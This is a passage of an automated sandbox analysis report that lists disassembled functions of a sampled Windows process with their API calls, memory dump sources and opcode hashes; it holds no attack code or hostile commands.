                                                                                                                                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF73D0677D1,?,?,?,?,00007FF73D066B9C,?,?,?,?,00007FF73D06521B), ref: 00007FF73D067B90
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                                                                      • String ID: FlsSetValue
                                                                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                                                                      • Opcode ID: 605d026beb460cb0610e248f1c62b005af4c8eddf6d7b6f0840c3fad1c0ef086
                                                                                                                                                                      • Instruction ID: 6ea3731d2ec638ea48e7d618dc567bad5d6c3a40b980c5f372ec1d13995151ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 605d026beb460cb0610e248f1c62b005af4c8eddf6d7b6f0840c3fad1c0ef086
                                                                                                                                                                      • Instruction Fuzzy Hash: 05E06C55B1D50AB2EA14ABD1E4405F89255FF88F50FD85031DA1D06654EF3CE844D220
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PerformanceQuery$Counter$FindFrequencyMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 352592371-2988720461
                                                                                                                                                                      • Opcode ID: c5edd6ac68af22d6ff23b605d72ce32a51ba2f39f1e3703ef5e68dbf5ca25d62
                                                                                                                                                                      • Instruction ID: e4c8398727c8bf5c544eaad10c71c1e4c75cca02c4b78752bc00fab42fd32aad
                                                                                                                                                                      • Opcode Fuzzy Hash: c5edd6ac68af22d6ff23b605d72ce32a51ba2f39f1e3703ef5e68dbf5ca25d62
                                                                                                                                                                      • Instruction Fuzzy Hash: 76E08C24F1E00AA2F718A7E1ACA26EA52519FD8B40FA40030C90906390EE2CA9818720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PerformanceQuery$Counter$FindFrequencyMessagePostSleepWindow
                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                      • API String ID: 352592371-2988720461
                                                                                                                                                                      • Opcode ID: 35964b126ede2340cc3cb8b265d761514cc110b47e06a52cb7d7ed6c3ffe4f4f
                                                                                                                                                                      • Instruction ID: 196f940b9009945cd90d8562a7eec6e3a0711c17e2302285a22e88a4d954ba2b
                                                                                                                                                                      • Opcode Fuzzy Hash: 35964b126ede2340cc3cb8b265d761514cc110b47e06a52cb7d7ed6c3ffe4f4f
                                                                                                                                                                      • Instruction Fuzzy Hash: 22E08C20F1E00AA2F708A7E1ACA26E652519F98B40FE40030C90906350EE2CA9818720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF73D065B71
                                                                                                                                                                      • _CxxThrowException.LIBVCRUNTIME ref: 00007FF73D065B82
                                                                                                                                                                        • Part of subcall function 00007FF73D0675A8: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73D065B87), ref: 00007FF73D06761D
                                                                                                                                                                        • Part of subcall function 00007FF73D0675A8: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF73D065B87), ref: 00007FF73D06764F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                      • API String ID: 3561508498-410509341
                                                                                                                                                                      • Opcode ID: 816de2b102184687e10c8520a63c3d66b362d7fdf4c2ab2474235bf412010b75
                                                                                                                                                                      • Instruction ID: d3e55d3e081c7438833657aec4fa2233cd67f48ecc5199300cc5eba9bcd38d02
                                                                                                                                                                      • Opcode Fuzzy Hash: 816de2b102184687e10c8520a63c3d66b362d7fdf4c2ab2474235bf412010b75
                                                                                                                                                                      • Instruction Fuzzy Hash: D5D0126272C98AA1DE10FBC0D884394A330FB80B04FD04431D14C415B1FF2CD546D310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%